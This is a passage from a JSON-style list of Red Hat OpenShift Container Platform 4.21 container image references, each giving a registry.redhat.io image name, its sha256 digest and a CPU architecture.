"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:f607a04fbff99b8e9fe049182f651c9be0492e6534013aff0743dd5a24954051_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c61aadb6f4c72f47bae25eb36b2b392432b9d1c52c25deb6c168689696092d4d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:d6abeb46b250118c1bc6d79a205fb2a28f1e2c87cc1782856e2b08d57726a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:f4dc5a0f19fd2ce83023001e4b8bd3f06d0f551187a8da64e3882783190a48f4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:c86603a6876ffc9fda19897fae53ce46f5ed1ec490e30c684a224c453146d9f7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:db4ea6f06a95e645bdc99ba1e80ce72119a0333c222c8565139a4481715e943a_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:f54a077136b77f7b7f4158ebe48dd8c327ed24f31d1f60bb74e377289c8f388d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:2b28ccc2527b7ee1d7d5eb702ce0cbda80f65f2b70380dcd461b078e85acdb4d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:344986bd16bbbd9fafe104e63c43c8049dec8a4851db413a807e8ae947a6d13c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:431d1f322a4f0234798ba728670ada359bc7671ce4f297907c0c8fcef3f0a881_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/frr-rhel9@sha256:6910c5b5446ae3efd828d830d67e07d64fcd15d03b188c54bcf222c0d9f1f074_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:3ee9539604dee7477d19a5769831e053bfa7b1e5611763a7eadad34bda111015_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:55ba05713a6b9e8a0cde50390e1935ae37f8f8dc8c98c7ee926a69c02605c7fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:79fa1f3a57e1db94048a410727dd6bacd4683e1a54bf699d3dd318a84a9ed45b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:b4fd7ff14b54766e058b847d7f91c13dc17bf661e45c07bca5bc9754d20e14ae_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:6c229d2b0ac3ea07cc7703cb778ee27a59b975a194041efa8cb3eea86a48652e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:846447487434a57df9b33f06fb5704fcc96ffa518baf6d99223c4e1795e5c643_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:9650cffbe1a64468fef27a62a960b67059d0d6ed59e2ef09c7900d29133c0864_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:a3972c8b0f417fadf45f1cc1a14543f02586b364171b8e60e7bcb90c98623dd0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:37c8160b545194fe3a91940a9fc8911383fd3674dcbc3135454b6872b04d7c42_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:cb234cf1c44de4b0b0713b2792e06e115830b115d540b494baccad28139b4fd2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:7f0514302066e0f199e33be56fe074f7666e223169df5f71b06e06779bdb6e8b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:df3552170db05d67f4e75e756495f62164a28bd7468f4093e43f3a7c13bf7682_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:9c8cebfcb7f84844bb476441b61c60a3c88fc562406c84689958b517282966d3_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:c7609e999d1c88e83dd99682b5756386c274d506704340d78be73efe9e6f35b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:07c82fce5e470c7ee9c3c1fdc6c953c962ed119411c88bf5fd4f0a08e3a0b9b7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:83a7a3bb3080d3386eb7fa7debe976a551c272a1d70f31d7cc05a437f175f0c2_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:aa7cbd8edc2a40bf3b8572f48f1174b46134ecd22c1a961984c7989398a5a0ab_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:e9c7cedabf9b749ae2faf9427a229757c3c1c5871054667444168030eab28aab_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f3470dd96c2c29ceef92ea0ab5adfcecead95eba0f1caa1fad96f3fdf50f57c6_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:f96eef8cedb41be61dcaf4850e5550582f0d84a306775dfc0c7f9958f18ba7ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:5d09872519b5a3247dd7a3d5bd250485dcd750307c3853e2cdf43519889178ff_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:63523bed0624b4db33be2b7a5e8dd3c5b532c70a3ad3083504aebc29e85d3a29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:20a2d23d2de3e31036ca89f2d629b6d06df5504b8f46c88a6cb5e081aa6afdc8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:c47e8b82686adae62dd7c66b82309407d82166f510384a404343e515b829001d_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:cb2a3088916b8d8f9489260792f677a59864ab01e9c62361198549b1f822a80b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:f18c64ad1dd81b9ae774488b6994b6d17f6aeb968e644652150ea08b3f6b4dbb_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:a0f3e8ad332f4e63e1aa2742eef069487fd49f4c335269da7b619f7630907a45_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:d2dfd7ae650a6eaced303a1119f94cc1a7097d7609e2a80d84aef5e6380d902e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:2d622f4dbba3bd91a020a734dc0d8c632e58d56373cae44c4af79cbc81a37cd4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:8a69bf9f6b9f8e3dc685d704d31b4a4eded70bdf33ed57dfa8768c016faae46a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:9d0697a33547102399cbeb0a60f9ebfb2a2eb4d3c0e15efba177a96dd27e60f8_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:c87863f0cd97c592cc54c1fc2ab9fbe1468d6302763eaa7a6530af059382d797_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:2a8fa4bac908dd97a3be2e302eb6ac1431dc3537beed23caf257d2c3f47bbc74_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:98994385568f84af533c448d17ae372eac4a26eda4a6b62277253155e20bae54_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:0b92ec408159a4f0e5308cf58ad89cc4ca40880ce097e0807a19c12f235ca5fc_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:291f1185778ccc92e28d235ab30ddb1f85fb94199d3889dcf600f35e60093d4c_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:7a6604dbc334622a976776e7725e4eba7ba4e8872a87f49bbb1c6f334b2f6c95_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:b2b43c379dcfac66d038927315c419c7d512ce1dd29b34c7dc74a00f7b63a0d1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5628a2419c5721f274edcfe794c881d1fb2af158788c45fbcb7a33f6db9948d4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:56b71e09ae6780121a1c0a52867782196cd43c3e716093fca3ceb3fde5b66d1f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:5c1172fb42f1b34b67f5e2044bb190849bacaf5eebabdafdc82d0a7f1c1a7d84_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:d617cb1a419f9d43b5bfff5bfdc670a9c8d0462b47c474d4d1ccea726c108101_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:03f260cff8faf00b22557be8d6be6f81489e9265b339c3a3053bfe5b1de020e7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:5cc05e80c48b83737bcd3f4622e0eedaed7baf06024c23753ca77ffc11b9b306_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:9df1f434a7eae17b9e335feb35d3cad8d15887bc55d2f20c8720ac17633e88f5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:e3d92a87de3c10beda3aba219657f079cafcd03c6ee0b87bd0826d3f51e85997_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:20f0c4f5e4678aac81a44e5f164627b29bbebfc3e17b5010ea7104309a234476_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:959c043c98f9c69d091fa1ff171360b2cf40e829becdc967f5b314e66ccf9fde_s390x",
